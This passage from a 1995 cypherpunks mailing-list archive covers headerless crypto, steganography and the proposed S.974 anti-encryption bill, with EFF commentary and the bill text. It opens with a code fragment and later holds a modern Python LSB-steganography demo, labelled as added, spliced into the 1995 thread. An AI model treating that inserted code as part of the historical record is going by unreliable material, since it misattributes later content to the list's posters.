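    keyring = {key_id(k): k for k in keys}
    recipient = keys[217]  # constructed choice of recipient
    outsider = hashlib.sha256(b"not-in-keyring").digest()
    text = b"constructed sample message"
    return {
        "header": open_with_header(keyring, seal(recipient, text, True)),
        "headerless": open_headerless(keys, seal(recipient, text, False)),
        # A message for someone else costs a full pass before it can be discarded.
        "not_ours": open_headerless(keys, seal(outsider, text, False)),
    }


if __name__ == "__main__":
    for name, (plaintext, trials) in demo().items():
        print(f"{name:10s} trials={trials:3d} plaintext={plaintext!r}")
```
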




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 13 Jul 95 12:53:53 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: def'n of "computer network"
In-Reply-To: <9507131946.AA12904@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950713154546.22974A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> Although I hardly oppose the construction of "headerless"
> cryptographic protocols, they make key management in any sort of a
> reasonable system a living hell. If you work for an organization
> maintaining a reasonable number of keys -- say a few hundred at some
> institution -- you will have to linearly search them to find which one
> is the right one. What a royal pain.

Hmmm.  No argument.  But seeing as it might all soon be illegal, I'd 
rather it be a possible pain than just plain impossible.

> Rapid deployment in ordinary software is, of course, preferable.

It would seem that we may be approaching the criminalization of crypto.  
In which case we'd still be in trouble.  Because they might criminalize 
the /use/ of crypto.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 13 Jul 95 12:54:12 PDT
To: perry@imsi.com
Subject: Re: def'n of "computer network"
In-Reply-To: <9507131927.AA12842@snark.imsi.com>
Message-ID: <199507131950.PAA08076@spl.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:

| > In addition, now is the time to deploy stego, on a massive scale.
| 
| I've said it before, and I'll say it again.
| 
| My opinion is that steganography "standards" are useless. Anyone can
| try unpeeling the GIFs and see if something interesting shows up
| inside. That means that the only useful stego suffers from the defect
| that symmetric key cryptography suffers from -- you have to have made
| serious pre-arrangements with the counterparty.

	While you may be right that a standard for stego in part
defeats the purpose of stego, the problem of not having some sort of
standard means that people with non-standard platforms (for some
definition of non-standard) will be shut out.

	Standards for interaction are useful, and if the thing being
stego'd is stealth PGP'd, then I'm not sure that the data pulled out
of a stego'd GIF need be any different than noise.

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 13 Jul 95 07:13:14 PDT
To: cypherpunks@toad.com
Subject: Steganography Mailing List
Message-ID: <9507131353.AA03886@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



For those who are interested:

A Steganography mailing list was created. The mail server is
in Germany, but we decided to talk English on the list.

Details can be found on http://www.thur.de/ulf/stegano/

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 15:54:08 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <ac2aef1700021004f93e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 AM 7/13/95, Douglas Barnes wrote:

>Since the Anti-Electronic Racketeering Act of 1995 might as well
>be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
>Tim throw in the towel already, when the bill hasn't even made it
>through committee yet.

I'd hardly call my view "throwing in the towel." What I said clearly enough
was that the Washingtonians can throw out repressive legislation much
faster than we can--and I speak in terms of "we" as being the EFF, EPIC,
NRA, ACLU, etc., and _not_ the Cypherpunks, who have no lobbying activities
to speak of.


>Go underground? Well, as I read it, this bill basically makes
>cypherpunks a "corrupt organization", subject to the full
>impact of the RICO statutes. With the passage of this bill, we

Indeed, this law makes the Cypherpunks group a co-conspirator. (In the same
way that the recent Omnibus Anti-Terrorism (or whatever it's called)
criminalizes groups which support This Year's Enemies. (Like the War with
Oceania--or was it Eurasia?--the friend of today was yesterday's criminal
organization. For example, the Omnibus bill makes support of anti-PLO
groups a crime, for foreigners, as the PLO is now, this year, our "Partner
for Peace.")

>will have the same status in the US as the neo-Nazis have in
>Germany, and will have to adopt similar communications and
>organization techniques. Who knows, maybe this is the best thing
>that could happen, although I'm real curious about who will
>back off to protect their ass-ets and who will actually keep
>on chugging towards crypto anarchy.
>
>In the short term, I've renewed or started memberships in the
>organizations that are likely to fight this -- but I'm also
>fired up to get more easy-to-use software out there, and
>do what I can to help build infrastructure that can resist this
>sort of nonsense.

This is all I'm suggesting, that yet another round of trying to persuade
Congress people is a waste, and that the _traditional_ focus on technology
is a better use of our time and effort.

Others are welcome to do as they wish. I'm just expressing my view that
Washington can spin out legislation faster than we can respond....they are,
after all, using our tax dollars to generate new laws, and have
intelligence agencies and law enforcement agencies on their side with
armies of lawyers and lobbyists to help. Multi-billion dollar budgets are
also at stake.

The lobbyists for preserving liberty are few and far between.

Some would say this means Cypherpunks should step into the fray and become
a lobbying group. I don't see us as having the structure or organization to
become such a group. Those who wish to should probably form a real group to
do this, with bylaws and elected officials.

Anarchies are great, but there's no way an anarchy can have a "spokesman,"
or a budget for travel and lobbying, or a hundred other things that a
lobbying group needs. Cypherpunks--this list--is just not in a position to
be this group.


--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 12:59:49 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: laws....
In-Reply-To: <Pine.SUN.3.91.950713154546.22974A-100000@rwd.goucher.edu>
Message-ID: <9507131959.AA12939@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



By the way, I'm really sick of the naming schemes on these laws. It's
only a matter of time before some 1984ish wag creates the "Omnibus
Universal Love and Happiness Act of 1998" providing the death penalty
for possessing trace quantities of marijuana or some such. The
Orwellian names on some of these bills are simply astounding.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 13 Jul 95 13:12:18 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: mistake on my part
In-Reply-To: <22250.9507131850@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.SOL.3.91.950713160218.27008G-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 13 Jul 1995 aba@atlas.ex.ac.uk wrote:

> 
> Perry Metzger <perry@imsi.com> writes on cpunks:
> > I made a small mistake -- the new bill does *not* make it a crime to
> > make crypto software available at Egghead -- but it does more or
> > less make distribution of crypto software over the internet
> > impossible if it isn't an escrow based system.
> 
> I thought there was some kind of "read my lips" type statement about
> not mandating key escrow a short while ago.  Making it illegal to not
> use escrow on the internet (in the US and certain materials) sounds
> dangerously close to mandating key escrow.
> 
> Also I remember one list member making a prediction, that as they'd
> said _definitely no key escrow_, that you could bet your ass that
> meant exactly the opposite, and that it would rear its head anytime
> soon.  I think the poster even had a prediction in terms of months,
> but don't have the original post handy, looks like he was right.
> 
> Anyway these things are in stages:
> 
> 1. voluntary key escrow
> 2. mandatory key escrow for certain materials
> 3. mandatory key escrow across the board
> 
> If they pull this off stage 2, I wonder how long till stage 3, I think
> it'll be time to leave the sinking ship while exit visas are still
> granted!

Seriously!

Looking for a place that:

(1.) is reasonably free

(2.) permits Americans to work

(3.) a person trained as an engineer can earn enough to feed and shelter
     self and 4 dependents.

Any suggestions?


> 
> Adam
> --
> ------------------ PGP.ZIP Part [025/713] -------------------
> M83PL=@FR8ES%:6Q"(F9A#)K!&_;X4TXZ?(T]6(]`>$*.^]3K*K["(239)\@F
> MHA\"<%"5(%N->/2!'>X3XPU<0!Y,F``58RK(F;K#XD2,^`F[L09CT1>MH,7/
> MC@FR+[`#J_`.6J`QW&"'YPZ4A[,XC10,0@\T1R.H\52,%3N1CI\TY('#M1)D
> -------------------------------------------------------------
> for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 16:09:37 PDT
To: "Robert A. Hayden" <cman@communities.com>
Subject: Re: Fight, or Roll Over?
Message-ID: <ac2af3ed010210041c19@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 PM 7/13/95, Robert A. Hayden wrote:
>On Thu, 13 Jul 1995, Douglas Barnes wrote:
>
>> Since the Anti-Electronic Racketeering Act of 1995 might as well
>> be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
>> Tim throw in the towel already, when the bill hasn't even made it
>> through committee yet.
>
>I don't think Tim threw in the towel on this bill, but has come to
>realize that the overall war on privacy cannot be won by concentrating on
>the individual battles.  We've ALL got to take a deep breath and come up
>with a different plan of attack; a plan that the TLAs and spooks will be
>unable to defend against.  Right now, as long as we're kept busy with
>individual bills and initiatives, they have us just where they want us.

Exactly!

By causing us to go into paroxysms of activity every time they throw a new
piece of legislation over the transom, we dissipate our efforts in more
promising areas.

There's a place for lobbying--and I'm even a member of the EFF. But
lobbying is best done by those with lobbying backgrounds, legal
backgrounds, and a penchant for fund-raising.

There was once talk, in April of '93, about the Washington, D.C.
Cypherpunks group adopting "lobbying" as their own special focus area, with
educational visits to Congressional aides and attendance at crypto-related
hearings. Nothing came of this, for whatever reasons.

Why do I mention this? Most Cypherpunks live far from Washington, and our
influence is minimal. Few can travel to D.C. on even an occasional basis,
etc. (Ironically, EFF is evacuating D.C. I won't get into what their
reasons might be, but certainly they will now have even less effect. I'll
say one thing: the leaders of EFF may have realized what a trap lobbying
can become, and have chosen to instead focus on other areas.)

Anyway, Cypherpunks is a worldwide, technological-oriented group. We can do
more by spreading technology and undermining repressive legislation than we
can by being just another ineffectual lobbying group.

As I said in another message, if folks want to do it, fine.
Organizationally and financially, we are not equipped for lobbying. No
budget, no leadership, no bylaws, no tax filings, no report writings,
nothing. (Some of these things are important for lobbying, some are less
so. The "leadership" part is pretty important: who could claim to "speak"
on behalf of Cypherpunks? Nobody.)

I suggest a different organization, a different mailing list, for this effort.

--Tim May


..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Thu, 13 Jul 95 16:38:30 PDT
To: cypherpunks@toad.com
Subject: Re: def'n of "computer network"
Message-ID: <9507132338.AA07522@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


imsi.com!perry ("Perry E. Metzger") writes:


>My opinion is that steganography "standards" are useless. Anyone can
>try unpeeling the GIFs and see if something interesting shows up
>inside. That means that the only useful stego suffers from the defect
>that symmetric key cryptography suffers from -- you have to have made
>serious pre-arrangements with the counterparty.

Perry, I don't understand.  If the least significant bits in my gif file
follow all the "known statistical distributions", how can anyone know 
whether they are "just noise" or are an encrypted message, (asymmetric or 
symmetric, either one) unless they have the key?  Why can't there be public 
key steganography?  Perhaps existing tools are inadequate, but are they
impossible?

Rick F. Hoselton  (who doesn't claim to present opinions for others)
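
The question raised in this thread (what an observer without the key learns by "unpeeling" the low-order bits) can be tried out directly. The following is an added example, not code from any poster in this thread. It assumes raw pixel bytes rather than a real GIF, a cover whose LSB plane is already uniform noise, a SHA-256 counter-mode keystream as a toy stand-in for headerless ("stealth") ciphertext, and a constructed 4-byte marker `MAGIC` standing in for any recognisable format header.

```python
import hashlib
from collections import Counter

MAGIC = b"\x99STG"   # constructed marker standing in for any recognisable format header
CHI2_LIMIT = 400.0   # 255 degrees of freedom: mean 255, sd about 22.6, so 400 is deep in the tail


def keystream(key: bytes, n: int) -> bytes:
    """SHA-256 in counter mode; a toy stand-in for a real cipher's output."""
    out = bytearray()
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:n])


def xor_cipher(key: bytes, data: bytes) -> bytes:
    """Encrypts and decrypts (XOR with the keystream)."""
    return bytes(d ^ k for d, k in zip(data, keystream(key, len(data))))


def embed(cover: bytes, payload: bytes) -> bytes:
    """Write the payload bits, MSB first, into the LSB of successive pixel bytes."""
    bits = [(byte >> s) & 1 for byte in payload for s in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("payload does not fit in cover")
    stego = bytearray(cover)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit
    return bytes(stego)


def peel(pixels: bytes) -> bytes:
    """What any observer can do: collect the LSB plane and repack it into bytes."""
    out = bytearray()
    for i in range(0, len(pixels) - len(pixels) % 8, 8):
        byte = 0
        for p in pixels[i:i + 8]:
            byte = (byte << 1) | (p & 1)
        out.append(byte)
    return bytes(out)


def byte_chi2(data: bytes) -> float:
    """Chi-square statistic of byte frequencies against a uniform distribution."""
    expected = len(data) / 256
    counts = Counter(data)
    return sum((counts.get(v, 0) - expected) ** 2 / expected for v in range(256))


def observer_report(pixels: bytes) -> dict:
    """Keyless inspection: look for a known header, then test for non-uniform bytes."""
    peeled = peel(pixels)
    chi2 = byte_chi2(peeled)
    return {
        "header_found": peeled.startswith(MAGIC),
        "chi2": chi2,
        "non_uniform": chi2 > CHI2_LIMIT,
    }


def build_samples(key: bytes = b"constructed shared key") -> dict:
    """Constructed inputs: one cover and three ways of filling its LSB plane."""
    cover = keystream(b"constructed cover noise", 8192)  # assumption: LSBs are noise
    message = (b"constructed plaintext " * 47)[:1024]
    return {
        "cover": cover,
        "plaintext": embed(cover, message),
        "with_header": embed(cover, MAGIC + xor_cipher(key, message[:1020])),
        "headerless": embed(cover, xor_cipher(key, message)),
        "message": message,
    }


if __name__ == "__main__":
    samples = build_samples()
    for name in ("cover", "plaintext", "with_header", "headerless"):
        r = observer_report(samples[name])
        print(f"{name:12s} header={r['header_found']!s:5s} "
              f"chi2={r['chi2']:8.1f} non_uniform={r['non_uniform']}")
```

Real image LSB planes are generally not uniform noise, so the result for the headerless case holds only under the condition Rick states, that the embedded bits match the cover's own statistics.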




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 16:35:48 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <ac2afc5802021004164a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:56 PM 7/13/95, Timothy C. May wrote:
>At 10:41 AM 7/13/95, Douglas Barnes wrote:
>
>>Since the Anti-Electronic Racketeering Act of 1995 might as well
>>be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
>>Tim throw in the towel already, when the bill hasn't even made it
>>through committee yet.
>
>I'd hardly call my view "throwing in the towel." What I said clearly enough
>was that the Washingtonians can throw out repressive legislation much
>faster than we can--and I speak in terms of "we" as being the EFF, EPIC,
                   ^

I meant to say, "...than we can respond to"


--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 13 Jul 95 16:50:50 PDT
To: cypherpunks@toad.com
Subject: EFF analysis: Anti-Electronic Racketeering Act (S.974)
Message-ID: <9507132350.AA08064@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From: ssteele@eff.org (Shari Steele)

*****  FEEL FREE TO DISTRIBUTE WIDELY  *****

On June 27, Senator Grassley (R-Iowa) introduced the Anti-Electronic
Racketeering Act, S.974.  The bill was designed "to prohibit certain acts
involving the use of computers in the furtherance of crimes, and for other
purposes."  Its immediate effect, among other things, would be to
criminalize the posting of any encryption software on any computer network
that foreign nationals can access (in other words, any computer network
period).  Because of poor wording, the bill would probably also criminalize
data compression and other non-cryptographic encoding schemes available on 
networks.  This includes the compression used in most of the images on 
Internet users' WWW homepages, not to mention uu and binhex encoding for 
transferring binary files via email, and even language encoding used to 
represent non-English characters, such as the SJIS scheme for representing
Japanese characters.

In addition, the bill seems to be directed at undermining two big fights
we've successfully waged in the past:  the Steve Jackson Games decision
against the United States Secret Service and the government's Clipper Chip
proposal.

Re:  Steve Jackson Games -- this bill would permit the government to avoid
the notice requirements of the Privacy Protection Act if "there is reason
to believe that the immediate seizure of such materials is necessary to
prevent the destruction or altercation [very Freudian sic!] of such
documents."  Furthermore, the government could use electronic evidence
seized that had not been particularly described in a warrant if 

"the seizure is incidental to an otherwise valid seizure, and the
government officer or employee-

   ''(A) was not aware that work product material was among the data seized;

   ''(B) upon actual discovery of the existence of work product materials, the
government officer or employee took reasonable steps to protect the privacy
interests recognized by this section, including-

   ''(i) using utility software to seek and identify electronically stored data
that may be commingled or combined with non-work product material; and

   ''(ii) upon actual identification of such material, taking reasonable steps
to protect the privacy of the material, including seeking a search warrant."  

Re:  Clipper Chip -- The bill would make it a crime "to distribute computer
software that encodes or encrypts electronic or digital communications to
computer networks that the person distributing the software knows or
reasonably should know, is accessible to foreign nationals and foreign
governments, regardless of whether such software has been designated as
nonexportable."  However, there is an exception:  "It shall be an
affirmative defense to prosecution under this section that the software at
issue used a universal decoding device or program that was provided to the
Department of Justice prior to the distribution."  This is essentially an
attempt to sneak the key "escrow" provisions of the Clipper scheme in
through a legislative back door.

Fortunately, the bill does not have a very promising future.  The bill has
no co-sponsors.  It was immediately referred to the Committee on the
Judiciary, where it currently sits.  LEXIS's bill tracking report only
gives it a 10% chance of passing out of the committee.

I thought Senator Grassley's own statement when he introduced the bill is
worth reading, so I'm attaching it here.  My favorite line is "Elliott Ness
needs to meet the Internet."  This is especially ironic in light of recent 
comparisons of hysteria about "dangerous" material on the internet, and 
Prohibition.

The bill itself follows.
Shari
------------------------------------------------------------------------
Shari Steele, Director of Legal Services                 ssteele@eff.org
Electronic Frontier Foundation                      202/861-7700 (voice)
1667 K Street, N.W., Suite 801                        202/861-1258 (fax)
Washington, DC  20006-1605                            202/861-1224 (BBS)



----------  Senator Grassley's Statement to the Senate  ----------

   Mr. President, I rise this evening to introduce the Anti-electronic
Racketeering Act of 1995. This bill makes important changes to RICO and
criminalizes deliberately using computer technology to engage in criminal
activity. I believe this bill is a reasonable, measured and strong response
to a growing problem.  According to the computer emergency and response
team at Carnegie-Mellon University, during 1994, about 40,000 computer
users were attacked. Virus hacker, the FBI's national computer crime squad
has investigated over 200 cases since 1991. So, computer crime is clearly
on the rise.

   Mr. President, I suppose that some of this is just natural. Whenever man
develops a new technology, that technology will be abused by some. And that is
why I have introduced this bill. I believe we need to seriously reconsider the
Federal Criminal Code with an eye toward modernizing existing statutes and
creating new ones. In other words, Mr. President, Elliot Ness needs to meet the
Internet.

   Mr. President, I sit on the Board of the Office of Technology Assessment.
That Office has clearly indicated that organized crime has entered cyberspace in
a big way. International drug cartels use computers to launder drug money and
terrorists like the Oklahoma City bombers use computers to conspire to commit
crimes.

   Computer fraud accounts for the loss of millions of dollars per year. And
often times, there is little that can be done about this because the computer
used to commit the crimes is located overseas. So, under my bill, overseas
computer users who employ their computers to commit fraud in the United States
would be fully subject to the Federal criminal laws.  Also under my bill, Mr.
President, the wire fraud statute which has been successfully used by
prosecutors for many users, will be amended to make fraudulent schemes which use
computers a crime.

   It is not enough to simply modernize the Criminal Code. We also have to
reconsider many of the difficult procedural burdens that prosecutors must
overcome. For instance, in the typical case, prosecutors must identify a
location in order to get a wiretapping order. But in cyberspace, it is often
impossible to determine the location. And so my bill corrects that so that if
prosecutors cannot, with the exercise of effort, give the court a location, then
those prosecutors can still get a wiretapping order. And for law enforcers-both
State and Federal-who have seized a computer which contains both contraband or
evidence and purely private material, I have created a good-faith standard so
that law enforcers are not shackled by undue restrictions but will also be
punished for bad faith.

   Mr. President, this brave new world of electronic communications and global
computer networks holds much promise. But like almost anything, there is the
potential for abuse and harm. That is why I urge my colleagues to support this
bill and that is why I urge industry to support this bill.

   On a final note, I would say that we should not be too scared of technology.
After all, we are still just people and right is still right and wrong is still
wrong. Some things change and some things do not. All that my bill does is say
you can't use computers to steal, to threaten others or conceal criminal
conduct.

   Mr. President, I ask unanimous consent that the text of the bill be printed
in the Record.

   There being no objection, the bill was ordered to be printed in the Record,
as follows:

   S. 974



   SECTION 1. SHORT TITLE.

   This Act may be cited as the ''Anti-Electronic Racketeering Act of 1995''.

   SEC. 2. PROHIBITED ACTIVITIES.

   (a) Definitions .-Section 1961(1) of title 18, United States Code, is
amended-

   (1) by striking ''1343 (relating to wire fraud)'' and inserting ''1343
(relating to wire and computer fraud)'';

   (2) by striking ''that title'' and inserting ''this title'';

   (3) by striking ''or (E)'' and inserting ''(E)''; and

   (4) by inserting before the semicolon the following: ''or (F) any act that is
indictable under section 1030, 1030A, or 1962(d)(2)''.

   (b) Use of Computer To Facilitate Racketeering Enterprise .-Section 1962 of
title 18, United States Code, is amended-

   (1) by redesignating subsection (d) as subsection (e); and

   (2) by inserting after subsection (c) the following new subsection:

   ''(d) It shall be unlawful for any person-

   ''(1) to use any computer or computer network in furtherance of a
racketeering activity (as defined in section 1961(1)); or

   ''(2) to damage or threaten to damage electronically or digitally stored
data.''.

   (c) Criminal Penalties .-Section 1963(b) of title 18, United States Code, is
amended-

   (1) by striking ''and'' at the end of paragraph (1);

   (2) by striking the period at the end of paragraph (2) and inserting '';
and''; and

   (3) by adding at the end the following new paragraph:

   ''(3) electronically or digitally stored data.''.

   (d) Civil Remedies .-Section 1964(c) of title 18, United States Code, is
amended by striking ''his property or business''.   [*S9181]  

   (e) Use as Evidence of Intercepted Wire or Oral Communications .-Section 2515
of title 18, United States Code, is amended by inserting before the period at
the end the following: '', unless the authority in possession of the intercepted
communication attempted in good faith to comply with this chapter. If the United
States or any State of the United States, or subdivision thereof, possesses a
communication intercepted by a nongovernmental actor, without the knowledge of
the United States, that State, or that subdivision, the communication may be
introduced into evidence''.

   (f) Authorization for Interception of Wire, Oral, or Electronic
Communications .-Section 2516(1) of title 18, United States Code, is amended-

   (1) by striking ''and'' at the end of paragraph (n);

   (2) by striking the period at the end of paragraph () and inserting '';
and''; and

   (3) by adding at the end the following new paragraph:

   ''(p) any violation of section 1962 of title 18.''.

   (g) Procedures for Interception .-Section 2518(4)(b) of title 18, United
States Code, is amended by inserting before the semicolon the following: ''to
the extent feasible''.

   (h) Computer Crimes .-

   (1) New prohibited activities .-Chapter 47 of title 18, United States Code,
is amended by adding at the end the following new section:

   ''§ 1030A. Racketeering-related crimes involving computers

   ''(a) It shall be unlawful-

   ''(1) to use a computer or computer network to transfer unlicensed computer
software, regardless of whether the transfer is performed for economic
consideration;

   ''(2) to distribute computer software that encodes or encrypts electronic or
digital communications to computer networks that the person distributing the
software knows or reasonably should know, is accessible to foreign nationals and
foreign governments, regardless of whether such software has been designated as
nonexportable; and

   ''(3) to use a computer or computer network to transmit a communication
intended to conceal or hide the origin of money or other assets, tangible or
intangible, that were derived from racketeering activity; and

   ''(4) to operate a computer or computer network primarily to facilitate
racketeering activity or primarily to engage in conduct prohibited by Federal or
State law.

   ''(b) For purposes of this section, each act of distributing software is
considered a separate predicate act. Each instance in which nonexportable
software is accessed by a foreign government, an agent of a foreign government,
a foreign national, or an agent of a foreign national, shall be considered as a
separate predicate act.

   ''(c) It shall be an affirmative defense to prosecution under this section
that the software at issue used a universal decoding device or program that was
provided to the Department of Justice prior to the distribution.''.

   (2) Clerical amendment .-The analysis at the beginning of chapter 47, United
States Code, is amended by adding at the end the following new item:

   ''1030A. Racketeering-related crimes involving computers.''.

   (3) Jurisdiction and venue .-Section 1030 of title 18, United States Code, is
amended by adding at the end the following new subsection:

   ''(g)(1)(A) Any act prohibited by this section that is committed using any
computer, computer facility, or computer network that is physically located
within the territorial jurisdiction of the United States shall be deemed to have
been committed within the territorial jurisdiction of the United States.

   ''(B) Any action taken in furtherance of an act described in subparagraph (A)
shall be deemed to have been committed in the territorial jurisdiction of the
United States.

   ''(2) In any prosecution under this section involving acts deemed to be
committed within the territorial jurisdiction of the United States under this
subsection, venue shall be proper where the computer, computer facility, or
computer network was physically situated at the time at least one of the
wrongful acts was committed.''.

   (i) Wire and Computer Fraud .-Section 1343 of title 18, United States Code,
is amended by striking ''or television communication'' and inserting
''television communication, or computer network or facility''.

   (j) Privacy Protection Act .-Section 101 of the Privacy Protection Act of
1980 (42 U.S.C. 2000aa) is amended-

   (1) in subsection (a)-

   (A) by striking ''or'' at the end of paragraph (1);

   (B) by striking the period at the end of paragraph (2) and inserting '';
or''; and

   (C) by adding at the end the following new paragraph:

   ''(3) there is reason to believe that the immediate seizure of such materials
is necessary to prevent the destruction or altercation of such documents.''; and

   (2) in subsection (b)-

   (A) by striking ''or'' at the end of paragraph (3);

   (B) by striking the period at the end of paragraph (4) and inserting '';
or''; and

   (C) by adding at the end the following new paragraph:

   ''(5) in the case of electronically stored data, the seizure is incidental to
an otherwise valid seizure, and the government officer or employee-

   ''(A) was not aware that work product material was among the data seized;

   ''(B) upon actual discovery of the existence of work product materials, the
government officer or employee took reasonable steps to protect the privacy
interests recognized by this section, including-

   ''(i) using utility software to seek and identify electronically stored data
that may be commingled or combined with non-work product material; and

   ''(ii) upon actual identification of such material, taking reasonable steps
to protect the privacy of the material, including seeking a search warrant.''.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Thu, 13 Jul 95 13:51:40 PDT
To: cypherpunks@toad.com
Subject: co-sponsors
Message-ID: <9507132051.AA13247@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


I searched Thomas and couldn't find any evidence of co-sponsors to the
Senate bill. Am I wrong here?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 13 Jul 95 14:00:59 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131059.AA20485@cs.umass.edu>
Message-ID: <Pine.SUN.3.91.950713163526.25718G-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, L. McCarthy wrote:

> STATEMENTS ON INTRODUCED BILLS AND JOINT RESOLUTIONS (Senate - June
> 27, 1995) 
> Sen. GRASSLEY
> 
> Mr. GRASSLEY. Mr. President, I rise this evening to introduce the
> Anti-electronic Racketeering Act of 1995. This bill makes important changes
> to RICO and criminalizes deliberately using computer technology to engage in
> criminal activity. I believe this bill is a reasonable, measured and strong
> response to a growing problem. According to the computer emergency and
> response team at Carnegie-Mellon University, during 1994, about 40,000
> computer users were attacked. Virus hacker, the FBI's national computer
> crime squad has investigated over 200 cases since 1991. So, computer crime is
> clearly on the rise.

Eh, what do "virus hackers" have to do with encryption, why is it these 
morons justify the destruction of encryption by mentioning hackers and 
viruses?

Additionally, does this mean that someone outside of the USA is in danger 
of being grabbed by RICO armed thugs from Uncle Sam's cadre for writing 
crypto software and publishing it in the open?  After all, once it winds 
up on some USA site, how do we know that someone outside the USA got his 
copy of SuperDuperNSASpookFree from a non-US site?  Just to be sure, 
we'll bust both the site operator and nab the guy who wrote it next time 
he drops in, or hell, we'll have him extradited.


> Mr. President, I suppose that some of this is just natural. Whenever man
> develops a new technology, that technology will be abused by some. And that
> is why I have introduced this bill. 

Yes, whenever man develops a privacy increasing technology, the spooks 
will see to it, that they abuse everyone's rights to that privacy, and 
then some!

> I believe we need to seriously reconsider
> the Federal Criminal Code with an eye toward modernizing existing statutes
> and creating new ones. In other words, Mr. President, Elliot Ness needs to
> meet the Internet.

Where is Elliot Ness?  I don't see any mafia.org on the net.  Anyone here 
see any such site?

> Mr. President, I sit on the Board of the Office of Technology Assessment.
> That Office has clearly indicated that organized crime has entered cyberspace
> in a big way. International drug cartels use computers to launder drug money
> and terrorists like the Oklahoma City bombers use computers to conspire to
> commit crimes.

Was it not proven that McVeigh and Co. >DID NOT< use a computer?  The AOL 
account was a hoax, no?  Where are the hordes of anti-USA terrorists, 
